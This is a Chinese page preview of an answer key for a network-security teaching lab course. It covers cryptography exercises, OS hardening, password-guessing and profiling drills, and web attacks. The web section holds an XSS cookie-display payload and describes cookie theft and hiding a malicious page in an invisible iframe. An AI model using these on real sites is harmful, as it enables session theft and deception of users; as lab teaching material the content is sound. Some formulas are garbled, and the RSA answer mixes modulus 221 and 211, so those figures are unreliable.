網(wǎng)絡(luò)信息安全教學(xué)實驗系統(tǒng)v3.2(參考答案)_第1頁
網(wǎng)絡(luò)信息安全教學(xué)實驗系統(tǒng)v3.2(參考答案)_第2頁
網(wǎng)絡(luò)信息安全教學(xué)實驗系統(tǒng)v3.2(參考答案)_第3頁
網(wǎng)絡(luò)信息安全教學(xué)實驗系統(tǒng)v3.2(參考答案)_第4頁
網(wǎng)絡(luò)信息安全教學(xué)實驗系統(tǒng)v3.2(參考答案)_第5頁
已閱讀5頁,還剩90頁未讀 繼續(xù)免費閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)

文檔簡介

網(wǎng)絡(luò)信息安全教學(xué)實驗系統(tǒng)實驗教程〔參考答案〕./實驗教程<V3.2>〔參考答案〕TeachingExperimentalSystemofNetworkandInformationSecurity##中軟吉大信息技術(shù)##.網(wǎng)絡(luò)信息安全教學(xué)實驗系統(tǒng)實驗教程〔參考答案〕目錄知識類實驗1實驗1敏感信息搜集1練習(xí)一敏感信息搜集1實驗3密碼心理學(xué)攻擊3練習(xí)一密碼心理學(xué)攻擊3實驗5古典密碼算法4練習(xí)一Caesar密碼4練習(xí)二單表置換密碼4實驗6對稱密碼算法5練習(xí)二AES算法5練習(xí)四RC4算法5實驗7非對稱密碼算法6練習(xí)一RSA算法6練習(xí)二ELGamal算法6實驗8Hash算法7練習(xí)一MD5算法7練習(xí)二SHA1算法7實驗9密碼應(yīng)用9練習(xí)一文件安全傳輸9實驗10PKI技術(shù)11練習(xí)一證書應(yīng)用11實驗11信息隱藏12練習(xí)一信息隱藏位圖法12練習(xí)二LSB水印算法12練習(xí)三DCT水印攻擊13實驗12系統(tǒng)安全14練習(xí)一Windows2003系統(tǒng)安全14任務(wù)一用戶權(quán)限管理14任務(wù)二審核策略設(shè)置14任務(wù)三注冊表安全設(shè)置15任務(wù)四TCP/IP篩選15任務(wù)五主機(jī)安全加固16練習(xí)二LinuxFC5系統(tǒng)安全17任務(wù)一權(quán)限模型17任務(wù)二安全訪問21任務(wù)三SELinux23實驗14Web安全25練習(xí)一Web腳本攻擊25任務(wù)一XSS腳本攻擊25練習(xí)二web服務(wù)器安全設(shè)置26任務(wù)一IIS安全設(shè)置26任務(wù)二Apache安全設(shè)置26練習(xí)三日志審計27練習(xí)四網(wǎng)絡(luò)事件審計28實驗15數(shù)據(jù)庫安全30練習(xí)一SQL注入30實驗16軟件安全32練習(xí)一軟件漏洞利用32實驗17協(xié)議脆弱性分析33練習(xí)一SNMP協(xié)議脆弱性分析33實驗18安全協(xié)議34練習(xí)一IPSec-IP安全協(xié)議34練習(xí)二SSL-安全套接層協(xié)議34實驗19信息搜集36練習(xí)一信息搜集36練習(xí)二主機(jī)發(fā)現(xiàn)37任務(wù)一ARP主機(jī)發(fā)現(xiàn)37練習(xí)三端口掃描37任務(wù)一TCP端口掃描37任務(wù)二UDP端口掃描37實驗20漏洞掃描38練習(xí)二模擬攻擊方法38練習(xí)三Web漏洞掃描器38實驗21網(wǎng)絡(luò)嗅探39練習(xí)二原始套接字嗅探器39練習(xí)三Winpcap嗅探器39實驗22緩沖區(qū)溢出40練習(xí)一緩沖區(qū)溢出攻擊40練習(xí)二本地緩沖區(qū)溢出40任務(wù)一利用跳轉(zhuǎn)指令實現(xiàn)緩沖區(qū)溢出40任務(wù)二定位參數(shù)地址實現(xiàn)緩沖區(qū)溢出40任務(wù)三緩沖區(qū)溢出實現(xiàn)用戶權(quán)限提升41練習(xí)三遠(yuǎn)程溢出與后門植入41實驗23拒絕服務(wù)攻擊42練習(xí)一洪泛攻擊42練習(xí)三Smurf攻擊42實驗24欺騙攻擊44練習(xí)一ARP欺騙44練習(xí)二ICMP重定向45實驗25網(wǎng)絡(luò)后門47練習(xí)一shell后門47練習(xí)二無端口后門47實驗26特洛伊木馬49練習(xí)一網(wǎng)頁木馬49練習(xí)二Webshell49練習(xí)三ARP木馬與ARP防火墻50練習(xí)五木馬免殺51練習(xí)六跳板52實驗27防火墻53練習(xí)一Windows2003防火墻應(yīng)用53練習(xí)二iptables應(yīng)用53實驗28入侵檢測58練習(xí)一基于網(wǎng)絡(luò)入侵檢測系統(tǒng)58練習(xí)二NIDS與防火墻聯(lián)動60練習(xí)三NIDS開發(fā)61練習(xí)四自建實用IDS62實驗29VPN64練習(xí)三利用OpenVPN構(gòu)建企業(yè)VPN64實驗30蜜罐蜜網(wǎng)65練習(xí)一蜜罐引入65練習(xí)四自制蜜罐65練習(xí)五蜜網(wǎng)仿真66實驗31引導(dǎo)區(qū)病毒67練習(xí)一DOS引導(dǎo)區(qū)病毒67實驗32文件型病毒68練習(xí)一PE病毒68實驗33宏病毒70練習(xí)一Word宏病毒70實驗34腳本病毒72練習(xí)一Java腳本病毒72練習(xí)二VB腳本病毒72實驗35型病毒73練習(xí)一Outlook病毒73實驗36蠕蟲病毒74練習(xí)一蠕蟲仿真74實驗37病毒行為分析75練習(xí)一病毒行為分析75實驗38文件恢復(fù)77練習(xí)一FAT32文件恢復(fù)77練習(xí)二Ext2文件恢復(fù)78實驗39RAID磁盤陣列80練習(xí)一RAID基礎(chǔ)80練習(xí)二RAID應(yīng)用80實驗41Wi-Fi基礎(chǔ)應(yīng)用82練習(xí)三AP橋模式82課題類實驗83實驗2主動防御安全網(wǎng)關(guān)的架設(shè)83實驗3部署多DMZ區(qū)的安全企業(yè)網(wǎng)絡(luò)92.知識類實驗實驗1敏感信息搜集練習(xí)一敏感信息搜集表1-1-1可能具有利用價值的信息性別男生日6月21血型B生肖兔星座雙子座省份##城市##表1-1-2可能具有利用價值的信息真實朋友王建表1-1-3可能具有利用價值的信息目標(biāo)##X磊目標(biāo)學(xué)校魯東大學(xué)表1-1-4可能具有利用價值的信息##X磊性別男手機(jī)leileiaideni126生日6月21血型B生肖兔星座雙子座省份##城市##大學(xué)名稱魯東大學(xué)大學(xué)入學(xué)年份2006大學(xué)院系機(jī)械學(xué)院大學(xué)班級0603班中學(xué)名稱####第一中學(xué)中學(xué)班級03級8班中學(xué)畢業(yè)年份20##實驗3密碼心理學(xué)攻擊練習(xí)一密碼心理學(xué)攻擊二.實驗流程〔4〕將成功破解到的結(jié)果填入表3-1-2中:表3-1-2賬戶密碼host1zhangleiHost219870621Host3Host4zhanglei123Host5zl0621Host6leileiaideni實驗5古典密碼算法練習(xí)一Caesar密碼一.手動完成Caesar密碼〔1〕對應(yīng)明文:datasecurityhasevolvedrapidly的密文:__GDWDVHFXULWBKDVHYROYHGUDSLGOB_.練習(xí)二單表置換密碼二.單表置換密碼分析〔2〕在密文中出現(xiàn)頻率最高的字母是__A__.與上表比較,它可能是由字母__E__置換的.AbcdefghijklmCHINABDEFGJKLNopqrstuvwxyzMOPQRSTUVWXYZ.實驗6對稱密碼算法練習(xí)二AES算法二.AES算法ByteSub變換:ShiftRow變換:練習(xí)四RC4算法二.RC4算法1.手動模擬RC4加密〔1〕實例化后的S_Box是:<0x01,0x00,0x07,0x05,0x02,0x04,0x08,0x06,0x03>.〔2〕加密后的密文數(shù)字序列是〔0x49,0x67,0x6D,0x64,0x6F,0x22,0x55,0x46,0x32,0x23〕..實驗7非對稱密碼算法練習(xí)一RSA算法一.RSA生成公鑰與加密解密過程演示〔7〕根據(jù)實驗原理中對RSA加密算法的介紹,當(dāng)素數(shù)P=13,素數(shù)q=17,私鑰d=143時,寫出RSA公鑰的生成過程:n=p*q=13*17=221z=<p-1>*<q-1>=12*16=192e=d-1<modz>=143-1<mod192>=47利用生成的公鑰,寫出對明文m=40的加密過程〔加密過程計算量比較大,請使用工具箱的RSA工具進(jìn)行計算〕:c=me<modn>=4047<mod211>=105利用私鑰d=143,對生成的密文進(jìn)行解密:m=cd<modn>=105143<mod211>=40練習(xí)二ELGamal算法一.ELGamal生成公鑰與加密解密過程演示〔4〕根據(jù)實驗原理中對ELGamal加密算法的介紹,當(dāng)素數(shù)P=311,本原元素g=136,私鑰X=3時,寫ELGamal公鑰的成生過程:y=gx<modp>=1363<mod311>=88利用生成的公鑰,寫出對明文m=40,隨機(jī)數(shù)x=2的加密過程:C1=gx<modp>=1362<mod311>=147k=yx<modp>=882<mod311>=280C2=<k*m><modp>=<280*40><mod311>=4利用私鑰X=3,對生成的密文進(jìn)行解密:k=C1X<modp>=1473<mod311>=280k-1=10m=<k-1*C2><modp>=<10*4><mod311>=40.實驗8Hash算法練習(xí)一MD5算法二.MD5算法請寫出第2輪第1步的運算過程以與經(jīng)過運算后的變量.運算過程:MD5第二輪的邏輯函數(shù)為:G<x,y,z>=<x&z>|<y&~z>MD5第2輪的操作程序為:GG<A,B,C,D,M[k],S,T[i]>它表示的邏輯為:A←B+<<A+G<B,C,D>+M[k]+T[i]><<<S><DAEAB5EF&91D9BEE8>|<2E87BDD9&~91D9BEE8>=BECEB5F9所以,邏輯函數(shù)值為:BECEB5F9DAEAB5EF+<<2B480E7C+BECEB5F9+31323334+F61E2562><<<5>=E7CE5760將得到的結(jié)果E7CE5760寫入變量A,運算完成.運算后的變量:A:E7CE5760B:DAEAB5EFC:2E87BDD9D:91D9BEE8練習(xí)二SHA1算法二.SHA1算法請寫出第21步的運算過程以與經(jīng)過運算后的變量.運算過程:SHA1的操作程序如下:SHA1第21步的邏輯函數(shù)為:ft=B⊕C⊕DSHA1第21步的操作程序為:A=<A<<<5>+ft<B,D,C>+E+Wt+KtB=AC=B<<<30D=CE=Df21=61E7F48C⊕C04BD57B⊕8279FF1E=A=<39669B34<<<5>+23D5DEE9+4E85FC91+E7CBEB94+6ED9EBA1=F5D51936B=39669B34C=61E7F48CD=C04BD57BE=8279FF1E計算完成.運算后的變量:A:F5D51936B:39669B34C:1879FD23D:C04BD57BE:8279FF1E.實驗9密碼應(yīng)用練習(xí)一文件安全傳輸實驗操作步驟設(shè)計:以實驗組主機(jī)A〔發(fā)送方〕和主機(jī)B〔接收方〕為例,設(shè)計的實驗步驟如下.〔1〕主機(jī)A與主機(jī)B協(xié)商實驗中用到的加密算法:DES〔對稱加密算法〕、RSA〔非對稱加密算法〕和MD5〔哈希函數(shù)〕;〔2〕主機(jī)A、B進(jìn)入"密碼工具〞|"加密解密〞|"RSA加密算法〞|"公鑰〞頁面,生成各自的公私鑰對,并將公鑰通告給對方;〔3〕主機(jī)A在目錄"D:\work\SecComm〞下新建文本文件"安全通信.txt〞.主機(jī)A進(jìn)入"密碼工具〞|"加密解密〞|"DES加密算法〞|"加密/解密〞頁面,自定義明文與64位密鑰,在這里明文m為"Springishere〞〔引號內(nèi)〕,會話密鑰k為"jlcss_ok〞〔引號內(nèi)〕,單擊"加密〞按鈕完成加密操作,將得到的密文復(fù)制到"安全通信.txt〞文件中;〔4〕主機(jī)A進(jìn)入"MD5哈希函數(shù)〞頁面,將明文m〔與DES加密的是同一個明文〕輸入到文本框中,將生成的十六進(jìn)制摘要復(fù)制到"RSA加密算法〞的"加密/解密簽名/驗證簽名〞頁面明文框中,用自己的私鑰對摘要進(jìn)行加密,并將加密結(jié)果復(fù)制到"安全通信.txt〞新行中;〔5〕主機(jī)A打開"RSA加密算法〞的"加密/解密〞頁面,在"明文〞框中輸入會話密鑰k,用主機(jī)B的公鑰對明文進(jìn)行加密,將加密結(jié)果復(fù)制到"安全通信.txt〞新行中.最終"安全通信.txt〞的文件內(nèi)容類似下圖;「說明」上圖從上至下第一部分是DES加密密文;第二部分是主機(jī)A的數(shù)字簽名;第三部分是對DES密鑰〔會話密鑰〕的加密密文.〔6〕主機(jī)A將該文件以附件的形式發(fā)送給主機(jī)B.主機(jī)B接收,并將"安全通信.txt〞文件保存至"D:\work\SecComm〞目錄中.〔7〕主機(jī)B打開文件"安全通信.txt〞,將上圖所示的第三部分復(fù)制到"RSA加密算法〞的"加密/解密〞頁面密文框中,使用自己的私鑰解密得到的明文就是會話密鑰k’;〔8〕主機(jī)B進(jìn)入"DES加密算法〞的"加密/解密〞頁面,使用會話密鑰k’對上圖所示的第一部分進(jìn)行解密,得到明文m’;〔9〕主機(jī)B對明文m’進(jìn)行md5哈希計算,得到明文摘要;〔10〕主機(jī)B進(jìn)入"RSA加密算法〞的"簽名/驗證簽名〞頁面,使用主機(jī)A的公鑰對上圖所示的第二部分〔主機(jī)A的數(shù)字簽名〕進(jìn)行簽名驗證得到明文摘要,將其與自己計算得到的明文摘要進(jìn)行對比,若相同則表明文件安全通信成功..實驗10PKI技術(shù)練習(xí)一證書應(yīng)用安全Web通信1.單向認(rèn)證<僅服務(wù)器需要身份認(rèn)證>〔3〕服務(wù)器下載、安裝由CA頒發(fā)的證書證書信息描述:無法將這個證書驗證到一個受信任的證書頒發(fā)機(jī)構(gòu).頒發(fā)者:CA.查看其是否存在不存在.服務(wù)器下載、安裝CA根證書證書信息描述:保證遠(yuǎn)程計算機(jī)的身份.頒發(fā)者:CA.查看其是否存在存在..實驗11信息隱藏練習(xí)一信息隱藏位圖法一.分析BMP圖像文件頭和信息頭分析BMP圖像文件頭和信息頭,表11-1-2內(nèi)容表11-1-2整個文件的大小00240036h=2359350字節(jié)從文件開始到圖像數(shù)據(jù)區(qū)之間的偏移量54字節(jié)每個像素的位數(shù)24位壓縮類型0:不壓縮圖像數(shù)據(jù)的大小2359350-54=2359296字節(jié)練習(xí)二LSB水印算法一.嵌入并提取水印<1〕pic1.bmp文件大小2359296字節(jié),其最多可以嵌入589818字節(jié)數(shù)據(jù).watermark.bmp的文件摘要是:6F67B30549D4A86C053AFD9FD7498F82<3〕再次查看pic1.bmp文件大小2359296字節(jié),對比嵌入前后圖像大小變化情況沒有變化.<5〕計算提取的水印文件摘要:6F67B30549D4A86C053AFD9FD7498F82,對比這個水印文件摘要內(nèi)容與之前watermark.bmp文件摘要,結(jié)果一致二.LSB水印算法源碼答案:參見應(yīng)用服務(wù)器中源碼答案11-2.練習(xí)三DCT水印攻擊一.嵌入并提取水印<1〕watermark.jpg文件摘要是:089F7B4920BD0CE8E4DEC84970E1C496.<4〕計算提取的水印文件的文件摘要:089F7B4920BD0CE8E4DEC84970E1C496..實驗12系統(tǒng)安全練習(xí)一Windows2003系統(tǒng)安全任務(wù)一用戶權(quán)限管理二.權(quán)限的四項基本原則演示1.拒絕優(yōu)先原則〔5〕訪問結(jié)果:拒絕訪問.2.權(quán)限最小原則〔1〕默認(rèn)情況下用戶test2隸屬組為:Users.〔2〕操作結(jié)果:拒絕修改.3.權(quán)限繼承原則〔4〕訪問結(jié)果:test31用戶可以完全訪問;test32用戶只可以讀取.4.權(quán)限累加原則〔5〕證實test4用戶對此目錄擁有的權(quán)限?test4用戶對此目錄有讀取、寫入、執(zhí)行的權(quán)限.三.NTFS分區(qū)上分配磁盤配額〔3〕記錄文件大小超過5M時的情況系統(tǒng)給出提示.任務(wù)二審核策略設(shè)置一.設(shè)置并驗證"審核對象訪問〞2.a(chǎn)udit目錄文件審核〔5〕系統(tǒng)的審核事件序列是:560、567、562.解釋序列事件:允許〔權(quán)限X圍內(nèi)〕訪問已存在對象c:\audit\general.txt;已使用與句柄相關(guān)的權(quán)限〔WriteData〕;已關(guān)閉對象句柄〔c:\audit\general.txt〕.〔6〕系統(tǒng)的審核事件序列是:560、560、567、560、567、562__.解釋序列事件:允許〔權(quán)限X圍內(nèi)〕訪問已存在對象c:\audit\新建文本文檔.txt;允許〔WriteData〕訪問已存在對象c:\audit;已使用與句柄相關(guān)的權(quán)限〔WriteData,即文件重命名由"新建文本文檔.txt到"general.txt〞〕;允許〔權(quán)限X圍內(nèi)〕訪問已存在對象c:\audit\general.txt;已使用與句柄相關(guān)的權(quán)限〔WriteData,C:\audit\general.txt文件寫操作〕;關(guān)閉對象c:\audit\general.txt句柄.〔7〕系統(tǒng)的審核事件序列是:560、567、562、560、567、562、560、567、562.解釋序列事件:允許〔ReadData〕訪問已存在對象c:\audit;已使用與句柄相關(guān)的權(quán)限〔ReadData,c:\audit〕;關(guān)閉對象c:\audit句柄;允許〔權(quán)限X圍內(nèi)〕訪問已存在對象c:\audit\general.txt;已使用與句柄相關(guān)的權(quán)限〔ReadData〕;關(guān)閉對象c:\audit\general.txt句柄;允許〔ReadData〕訪問已存在對象c:\audit;已使用與句柄相關(guān)的權(quán)限〔ReadData,c:\audit〕;關(guān)閉對象c:\audit句柄.任務(wù)三注冊表安全設(shè)置一.注冊表安全設(shè)置5.防火墻TTL主機(jī)類型探測〔1〕查看返回TTL值128.〔2〕查看本機(jī)TTL值110.任務(wù)四TCP/IP篩選一.端口篩選〔4〕訪問結(jié)果:無法顯示網(wǎng)頁.〔6〕此時主機(jī)A的Netcat提示信息是:主機(jī)A的Netcat提示信息是:connectto[主機(jī)A的IP]from主機(jī)B的主機(jī)名稱[主機(jī)B的IP]主機(jī)B的連接端口.任務(wù)五主機(jī)安全加固一.漏洞掃描與測試1.漏洞掃描 表12-1-1檢測報告表系統(tǒng)類型Windows2003開放端口與服務(wù)〔端口/服務(wù)〕端口服務(wù)21ftp23telnet80www135epmap139netbios-ssn445microsoft-ds系統(tǒng)用戶Administrator;Guest;IUSER_HOST;IWAM_HOST;student;SUPPORT_388945a0;test;zzzz2.漏洞測試〔3〕在主機(jī)B的D盤下新建名稱為"jlcss〞的文件夾,命令為mkdirjlcss.通知主機(jī)B查看D盤是否出現(xiàn)名為"jlcss〞的文件夾是.〔4〕主機(jī)A打開IE瀏覽器,在地址欄中輸入"ftp://主機(jī)B的IP地址〞,能否訪問能.二.安全加固實施2.關(guān)閉ipc$空連接出現(xiàn)提示:發(fā)生系統(tǒng)錯誤64.指定的網(wǎng)絡(luò)名不再可用.3.禁用NetBIOS出現(xiàn)提示:Hostnotfound.4.關(guān)閉445端口〔2〕此時445端口是否開啟否.5.禁止Telnet服務(wù).主機(jī)A重新telnet主機(jī)B,出現(xiàn)提示不能打開到主機(jī)的連接,在端口23:連接失敗.6.禁止ftp服務(wù)主機(jī)B的21端口是否關(guān)閉?是主機(jī)A通過ftp訪問主機(jī)B,結(jié)果如何?無法與服務(wù)器建立連接三.加固測試表12-1-2加固測試檢測報告對比項加固前加固后掃描時間系統(tǒng)當(dāng)前時間系統(tǒng)當(dāng)前時間漏洞數(shù)量50警告數(shù)量150提示數(shù)量287是否發(fā)現(xiàn)安全漏洞是否是否檢測到NetBIOS信息是否練習(xí)二LinuxFC5系統(tǒng)安全任務(wù)一權(quán)限模型一.用戶賬戶操作1.添加用戶〔1〕執(zhí)行命令:useradd-d/home/user1-s/bin/bashuser1.執(zhí)行命令:passwduser1. 〔2〕執(zhí)行命令:useradd-d/home/user2-s/bin/shuser2.執(zhí)行命令:passwduser2.〔3〕執(zhí)行命令:vim/etc/passwd.查看結(jié)果如下:user1:x:502:502::/home/user1:/bin/bash.user2:x:503:503::/home/user2:/bin/sh.〔4〕允許user1或user2寫操作的目錄有:①目錄所有者非user和user2,文件訪問權(quán)限為所有人可寫.如/etc、/tmp目錄.②目錄所屬組為user1或user2組,文件訪問權(quán)限為屬組可寫.③目錄所有者為user1或user2,文件訪問權(quán)限為所有者可寫.如/home/user1或/home/user2.2.添加用戶組 〔1〕執(zhí)行命令:groupadd-g601newgroup1.〔2〕執(zhí)行命令:groupadd-g602newgroup2.〔3〕執(zhí)行命令:vim/etc/group.查看結(jié)果如下:newgroup1:x:601:.newgroup2:x:602:.3.添加用戶附加組 〔1〕執(zhí)行命令:usermod-Gnewgroup1,newgroup2user1. 〔2〕執(zhí)行命令:usermod-Gnewgroup1,newgroup2user2.〔3〕執(zhí)行命令:vim/etc/group.查看結(jié)果如下:newgroup1:x:601:user1,user2.newgroup2:x:602:user1,user2.4.用戶組刪除用戶 〔1〕執(zhí)行命令:gpasswd-duser1newgroup1. 〔2〕執(zhí)行命令:gpasswd-duser2newgroup2.〔3〕執(zhí)行命令:vim/etc/group.查看結(jié)果如下:newgroup1:x:601:user2.newgroup2:x:602:user1.5.刪除用戶 〔1〕執(zhí)行命令:userdel-ruser1. 〔2〕執(zhí)行命令:userdel-ruser2.〔3〕執(zhí)行命令:vim/etc/passwd.〔4〕執(zhí)行命令:vim/etc/group.查看結(jié)果如下:newgroup1:x:601:.newgroup2:x:602:.6.刪除用戶組〔1〕執(zhí)行命令:groupdelnewgroup1.〔2〕執(zhí)行命令:groupdelnewgroup2.二.文件訪問權(quán)限1.表12-2-1gzip文件屬性文件數(shù)1文件所有者root文件屬組root文件大小〔字節(jié)〕299464最后訪問時間略表12-2-2gzip文件訪問權(quán)限文件所有者文件屬組其它用戶讀取可讀可讀可讀寫入可寫不可寫不可寫執(zhí)行可執(zhí)行可執(zhí)行可執(zhí)行2.修改文件訪問權(quán)限〔1〕執(zhí)行命令:cp/usr/bin/gnome-terminal/home/guest.〔2〕執(zhí)行命令:cp/usr/bin/gnome-terminal/home/guestgnome-terminal2.chmodo-xgnome-terminal2或chmod754gnome-terminal2.〔3〕gnome-ternimal2沒有執(zhí)行成功;因為guest用戶沒有執(zhí)行權(quán)限.〔4〕執(zhí)行命令:chgrpguestgonme-terminal2或chown:guestgonme-terminal2此時文件gnome-terminal2的權(quán)限位為:rw表示:-rwxr-xr--.代碼表示:754.〔5〕成功;因為gnome-terminal2文件屬組為guest,guest用戶對該文件有執(zhí)行權(quán)限.3.設(shè)置默認(rèn)權(quán)限〔1〕默認(rèn)文件訪問權(quán)限是0022,將其翻譯為rw表示為:-rwxr-xr-x.〔2〕mask值為0037.〔3〕執(zhí)行命令:cp/usr/bin/gnome-terminal/home/guest.4.特殊權(quán)限位〔1〕〔第一次〕在guest用戶控制臺中執(zhí)行writecode,code文件是否寫入成功不成功.為什么只有root用戶〔文件擁有者〕對code文件擁有寫權(quán)限,以guest用戶執(zhí)行writecode對code文件進(jìn)行寫操作權(quán)限不夠.〔第二次〕在guest用戶控制臺中執(zhí)行writecode,code文件是否寫入成功成功.為什么setuid權(quán)限位可以讓一般用戶在執(zhí)行程序時,能夠使執(zhí)行用戶暫時擁有文件所有者的權(quán)限,即guest用戶對writecode擁有了root的權(quán)限.〔2〕code文件的訪問權(quán)限:root用戶只讀,root組用戶可寫,其它用戶只讀.writecode文件的訪問權(quán)限:root用戶讀、寫、執(zhí)行,root組用戶讀、執(zhí)行,其它用戶讀、執(zhí)行.〔第一次〕在guest用戶控制臺中執(zhí)行writecode,code文件是否寫入成功不成功.為什么此時只有root組用戶才可對code文件進(jìn)行寫操作.〔第二次〕在guest用戶控制臺中執(zhí)行writecode,code文件是否寫入成功成功.為什么setgid權(quán)限位可以讓一般用戶在執(zhí)行程序時,能夠使執(zhí)行用戶暫時擁有文件所屬組的權(quán)限,即guest用戶對writecode用戶擁有了root組的權(quán)限.任務(wù)二安全訪問一.使用xinetd實施主機(jī)訪問控制1.telnet服務(wù)的參數(shù)配置〔2〕telnet監(jiān)聽端口23.telnet服務(wù)守護(hù)進(jìn)程名xinetd.〔3〕表12-2-3xinetd-telnet配置項啟動xinetd服務(wù)時是否自動打開telnet服務(wù)disable=notelnet服務(wù)使用的數(shù)據(jù)傳輸方式socket_type=stream執(zhí)行telnet服務(wù)的用戶user=root啟動telnet服務(wù)所使用的命令wait=no登錄不成功時日志記載的信息log_on_failure+=USERID〔4〕記錄追加的配置項:no_access=同組主機(jī)IP.〔5〕登錄不成功;因為本機(jī)已經(jīng)拒絕同組主機(jī)訪問本機(jī)的telnet服務(wù).〔6〕記錄追加的配置項:per_source=2.重啟xinetd服務(wù)命令:servicexinetdrestart.〔7〕登錄成功次數(shù)為2.同組主機(jī)繼續(xù)嘗試登錄:成功.〔8〕注釋掉pre_source項.禁止系統(tǒng)提供telnet服務(wù),命令:disable=yes.二.使用TCPWrappers實施主機(jī)訪問控制〔4〕同組主機(jī)嘗試遠(yuǎn)程登錄、FTP登錄當(dāng)前主機(jī).登錄不成功.〔5〕請同實驗組其它主機(jī)遠(yuǎn)程登錄、FTP登錄當(dāng)前主機(jī).登錄成功.〔6〕添加規(guī)則內(nèi)容為ALL:ALL.登錄狀況:不成功.〔7〕規(guī)則內(nèi)容為:in.telnetd:同組主機(jī)IPvsftpd:同組主機(jī)IP〔8〕/var/log/tcp-wrappers日志中的信息格式:星期;月;日期;時間;CST;年;同組主機(jī)IP.三.使用SSH安全通信〔2〕主機(jī)間是否為明文傳輸是;可否捕獲到telnet登錄口令可以.2.FTP傳輸?shù)牟话踩则炞C〔1〕記錄輸入的明文內(nèi)容略.〔2〕Snort命令:·/snort-devsrc本機(jī)IPorsrc同組主機(jī)IP.3.SSH遠(yuǎn)程登錄〔3〕Snort命令:·/snort-devsrc本機(jī)IPorsrc同組主機(jī)IP.〔5〕SSH服務(wù)器版本號OpenSSH4.3.捕獲到的客戶端登錄口令:登錄口令捕獲不到.主機(jī)間信息傳輸是否安全:安全〔密文傳輸〕.4.SCP遠(yuǎn)程文件復(fù)制〔1〕Snort命令:·/snort-devsrc本機(jī)IPorsrc同組主機(jī)IP.〔3〕捕獲到的客戶端登錄口令:登錄口令捕獲不到.文件拷貝是否安全,為什么?安全;因為傳輸信息是密文傳輸.5.修改SSH服務(wù)為xinetd啟動 〔2〕停止sshd服務(wù),命令:/etc/init.d/sshdstop. 〔3〕重啟xinetd服務(wù),命令:servicexinetdrestart. 〔4〕查看sshd服務(wù)端口對應(yīng)的進(jìn)程:netstat-natp查看對應(yīng)的進(jìn)程名稱為xinetd. 〔5〕同組主機(jī)訪問SSH服務(wù):可以成功訪問ssh服務(wù).任務(wù)三SELinux一.增強(qiáng)Apache服務(wù)安全〔1〕在/opt目錄下新建目錄virdir,具體命令是:mkdir/opt/virdir.〔2〕重新啟動d服務(wù),具體命令是:servicedrestart.〔3〕頁面訪問信息為:openfilefailed.分析產(chǎn)生該結(jié)果的原因:apache系統(tǒng)用戶對test.php文件無寫權(quán)限.〔4〕操作方法:chownapache:apache/opt/virdir.頁面訪問信息為writefilesuccess!.〔5〕查看虛擬目錄安全上下文:無.〔6〕操作方法:vim/etc/selinux/config.〔7〕頁面訪問信息為openfilefailed.分析產(chǎn)生該結(jié)果的原因:apache服務(wù)進(jìn)程d的安全domain為_t,此域僅能夠讀被賦予d_sys_content_t標(biāo)簽的文件.〔8〕頁面訪問信息為writefilesuccess!.解釋上述原因:虛擬目錄與目錄內(nèi)包含的文件擁有了d_sys_content_t標(biāo)簽.二.增強(qiáng)Mysql數(shù)據(jù)庫安全〔1〕啟動mysqld服務(wù).servicemysqldstart.〔3〕mv/var/lib/mysql/test/opt.〔4〕vim/etc/selinux/config.〔5〕mv/opt/test/var/lib/mysql.查看test、mysql目錄安全上下文,具體命令是:ls-dZ目錄名.二者的安全上下文分別是:system_u:object_r:usr_t.system_u:object_r:mysqld_db_t.〔6〕操作是否成功?否.〔7〕操作方法:chcon-R-tmysqld_db_t/var/lib/mysql/test.〔8〕操作是否成功?成功.mysql服務(wù)進(jìn)程mysqld的安全domain〔域〕:mysqld_db_t.mysqld安全域?qū)А瞞ysqld_db_t〕標(biāo)簽的文件具有讀寫權(quán)限..實驗14Web安全練習(xí)一Web腳本攻擊任務(wù)一XSS腳本攻擊一.認(rèn)識XSS2.對DOM技術(shù)的利用〔1〕結(jié)果該頁面利用DOM技術(shù)中的document.URL對象取出name參數(shù)后面的字符串username,然后用document.write函數(shù)將其顯示到網(wǎng)頁中.〔2〕代碼<script>alert<document.cookie></script>將被插入到當(dāng)前的網(wǎng)頁中,瀏覽器直接執(zhí)行了這段代碼后,就會將用戶的cookie信息直接顯示出來,XSS攻擊發(fā)生了.二.盜取cookie〔1〕這說明父頁在一定條件下能夠控制子頁的某些行為.〔3〕這段代碼主要是將盜取的cookie保存至主機(jī)A服務(wù)器的cookie.txt文件中.〔6〕訪問地址為://主機(jī)A的IP:9090/xss.html.三.腳本攻擊〔StoredXSS〕〔3〕主機(jī)B用test賬號訪問自己主機(jī)中的論壇,并來到mymodify.asp頁面,觀察效果,效果為網(wǎng)頁彈出了主機(jī)A中的index.html頁面.四.DOM-BasedXSS挖掘〔3〕實驗效果為:網(wǎng)頁中被插入了asptroy.asp頁面.〔4〕主機(jī)A與同組人一起討論應(yīng)如何利用該漏洞將iframe中的width與heigh數(shù)值設(shè)置為0,隱藏插入的惡意網(wǎng)頁,并將構(gòu)造的URL腳本部分進(jìn)行轉(zhuǎn)碼,偽裝URL,使用該URL進(jìn)行欺騙攻擊.練習(xí)二web服務(wù)器安全設(shè)置任務(wù)一IIS安全設(shè)置一.搭建IIS服務(wù)器3.創(chuàng)建FTP站點主機(jī)B打開IE瀏覽器,登錄主機(jī)A的FTP站點"ftp://主機(jī)A的IP地址:7777〞并嘗試對"A的文本文檔.txt〞進(jìn)行讀取/寫入/修改/刪除等操作,查看哪種操作成功.只有讀取成功.二.身份驗證和權(quán)限設(shè)置2.FTP站點的身份驗證和權(quán)限設(shè)置主機(jī)B此時是否可以將寫好的文本文件復(fù)制到FTP站點內(nèi)?可以.任務(wù)二Apache安全設(shè)置一.熟悉Apache配置〔1〕Apache的文檔根目錄/var/www/html.〔2〕該Apache的文檔根目錄可以使用哪些特性O(shè)ptionsIndexesFollowSymLinks;AllowOverrideNone;Orderallow,deny;allowfromall..〔3〕訪問本機(jī)test目錄,觀察訪問結(jié)果可以成功訪問,列出該目錄下的所有文件名.再次訪問本機(jī)test目錄,觀察訪問結(jié)果提示Forbidden,禁止訪問.對比以上兩種現(xiàn)象,說明Indexes選項的作用與其在實際應(yīng)用中的意義Indexes選項可以控制在訪問目錄時果然沒有默認(rèn)主頁是否顯示該目錄下的所有文件,在實際應(yīng)用中可以防止黑客掃描該服務(wù)器上的所有網(wǎng)頁.〔4〕訪問本機(jī)頁面"文檔根目錄/test/one.html〞,觀察訪問結(jié)果NotFound.再次訪問本機(jī)test目錄,觀察訪問結(jié)果成功訪問到one.html中的內(